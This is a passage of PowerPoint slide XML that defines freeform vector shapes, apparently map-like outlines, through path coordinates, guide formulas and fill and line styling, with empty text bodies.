                    <a:lnTo>
                      <a:pt x="58" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="56"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36096" name="Freeform 229"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2842" y="2096"/>
                <a:ext cx="191" cy="221"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 191"/>
                  <a:gd name="T1" fmla="*/ 170 h 221"/>
                  <a:gd name="T2" fmla="*/ 27 w 191"/>
                  <a:gd name="T3" fmla="*/ 142 h 221"/>
                  <a:gd name="T4" fmla="*/ 38 w 191"/>
                  <a:gd name="T5" fmla="*/ 136 h 221"/>
                  <a:gd name="T6" fmla="*/ 51 w 191"/>
                  <a:gd name="T7" fmla="*/ 149 h 221"/>
                  <a:gd name="T8" fmla="*/ 44 w 191"/>
                  <a:gd name="T9" fmla="*/ 171 h 221"/>
                  <a:gd name="T10" fmla="*/ 116 w 191"/>
                  <a:gd name="T11" fmla="*/ 35 h 221"/>
                  <a:gd name="T12" fmla="*/ 106 w 191"/>
                  <a:gd name="T13" fmla="*/ 31 h 221"/>
                  <a:gd name="T14" fmla="*/ 92 w 191"/>
                  <a:gd name="T15" fmla="*/ 39 h 221"/>
                  <a:gd name="T16" fmla="*/ 93 w 191"/>
                  <a:gd name="T17" fmla="*/ 47 h 221"/>
                  <a:gd name="T18" fmla="*/ 92 w 191"/>
                  <a:gd name="T19" fmla="*/ 58 h 221"/>
                  <a:gd name="T20" fmla="*/ 116 w 191"/>
                  <a:gd name="T21" fmla="*/ 89 h 221"/>
                  <a:gd name="T22" fmla="*/ 131 w 191"/>
                  <a:gd name="T23" fmla="*/ 110 h 221"/>
                  <a:gd name="T24" fmla="*/ 154 w 191"/>
                  <a:gd name="T25" fmla="*/ 117 h 221"/>
                  <a:gd name="T26" fmla="*/ 158 w 191"/>
                  <a:gd name="T27" fmla="*/ 129 h 221"/>
                  <a:gd name="T28" fmla="*/ 189 w 191"/>
                  <a:gd name="T29" fmla="*/ 149 h 221"/>
                  <a:gd name="T30" fmla="*/ 183 w 191"/>
                  <a:gd name="T31" fmla="*/ 156 h 221"/>
                  <a:gd name="T32" fmla="*/ 170 w 191"/>
                  <a:gd name="T33" fmla="*/ 147 h 221"/>
                  <a:gd name="T34" fmla="*/ 162 w 191"/>
                  <a:gd name="T35" fmla="*/ 151 h 221"/>
                  <a:gd name="T36" fmla="*/ 165 w 191"/>
                  <a:gd name="T37" fmla="*/ 165 h 221"/>
                  <a:gd name="T38" fmla="*/ 168 w 191"/>
                  <a:gd name="T39" fmla="*/ 178 h 221"/>
                  <a:gd name="T40" fmla="*/ 156 w 191"/>
                  <a:gd name="T41" fmla="*/ 190 h 221"/>
                  <a:gd name="T42" fmla="*/ 145 w 191"/>
                  <a:gd name="T43" fmla="*/ 191 h 221"/>
                  <a:gd name="T44" fmla="*/ 153 w 191"/>
                  <a:gd name="T45" fmla="*/ 182 h 221"/>
                  <a:gd name="T46" fmla="*/ 148 w 191"/>
                  <a:gd name="T47" fmla="*/ 162 h 221"/>
                  <a:gd name="T48" fmla="*/ 136 w 191"/>
                  <a:gd name="T49" fmla="*/ 151 h 221"/>
                  <a:gd name="T50" fmla="*/ 125 w 191"/>
                  <a:gd name="T51" fmla="*/ 143 h 221"/>
                  <a:gd name="T52" fmla="*/ 120 w 191"/>
                  <a:gd name="T53" fmla="*/ 139 h 221"/>
                  <a:gd name="T54" fmla="*/ 108 w 191"/>
                  <a:gd name="T55" fmla="*/ 128 h 221"/>
                  <a:gd name="T56" fmla="*/ 80 w 191"/>
                  <a:gd name="T57" fmla="*/ 105 h 221"/>
                  <a:gd name="T58" fmla="*/ 58 w 191"/>
                  <a:gd name="T59" fmla="*/ 72 h 221"/>
                  <a:gd name="T60" fmla="*/ 35 w 191"/>
                  <a:gd name="T61" fmla="*/ 61 h 221"/>
                  <a:gd name="T62" fmla="*/ 18 w 191"/>
                  <a:gd name="T63" fmla="*/ 68 h 221"/>
                  <a:gd name="T64" fmla="*/ 7 w 191"/>
                  <a:gd name="T65" fmla="*/ 54 h 221"/>
                  <a:gd name="T66" fmla="*/ 3 w 191"/>
                  <a:gd name="T67" fmla="*/ 43 h 221"/>
                  <a:gd name="T68" fmla="*/ 7 w 191"/>
                  <a:gd name="T69" fmla="*/ 33 h 221"/>
                  <a:gd name="T70" fmla="*/ 21 w 191"/>
                  <a:gd name="T71" fmla="*/ 27 h 221"/>
                  <a:gd name="T72" fmla="*/ 30 w 191"/>
                  <a:gd name="T73" fmla="*/ 19 h 221"/>
                  <a:gd name="T74" fmla="*/ 40 w 191"/>
                  <a:gd name="T75" fmla="*/ 27 h 221"/>
                  <a:gd name="T76" fmla="*/ 47 w 191"/>
                  <a:gd name="T77" fmla="*/ 17 h 221"/>
                  <a:gd name="T78" fmla="*/ 55 w 191"/>
                  <a:gd name="T79" fmla="*/ 19 h 221"/>
                  <a:gd name="T80" fmla="*/ 59 w 191"/>
                  <a:gd name="T81" fmla="*/ 12 h 221"/>
                  <a:gd name="T82" fmla="*/ 67 w 191"/>
                  <a:gd name="T83" fmla="*/ 7 h 221"/>
                  <a:gd name="T84" fmla="*/ 80 w 191"/>
                  <a:gd name="T85" fmla="*/ 1 h 221"/>
                  <a:gd name="T86" fmla="*/ 93 w 191"/>
                  <a:gd name="T87" fmla="*/ 9 h 221"/>
                  <a:gd name="T88" fmla="*/ 109 w 191"/>
                  <a:gd name="T89" fmla="*/ 19 h 221"/>
                  <a:gd name="T90" fmla="*/ 113 w 191"/>
                  <a:gd name="T91" fmla="*/ 26 h 221"/>
                  <a:gd name="T92" fmla="*/ 134 w 191"/>
                  <a:gd name="T93" fmla="*/ 221 h 221"/>
                  <a:gd name="T94" fmla="*/ 98 w 191"/>
                  <a:gd name="T95" fmla="*/ 204 h 221"/>
                  <a:gd name="T96" fmla="*/ 100 w 191"/>
                  <a:gd name="T97" fmla="*/ 194 h 221"/>
                  <a:gd name="T98" fmla="*/ 121 w 191"/>
                  <a:gd name="T99" fmla="*/ 197 h 221"/>
                  <a:gd name="T100" fmla="*/ 142 w 191"/>
                  <a:gd name="T101" fmla="*/ 195 h 221"/>
                  <a:gd name="T102" fmla="*/ 139 w 191"/>
                  <a:gd name="T103" fmla="*/ 216 h 221"/>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91"/>
                  <a:gd name="T157" fmla="*/ 0 h 221"/>
                  <a:gd name="T158" fmla="*/ 191 w 191"/>
                  <a:gd name="T159" fmla="*/ 221 h 221"/>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91" h="221">
                    <a:moveTo>
                      <a:pt x="37" y="176"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="35" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="176"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="116" y="35"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="114" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="35"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="134" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="129" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="221"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36097" name="Freeform 230"/>
              <p:cNvSpPr>
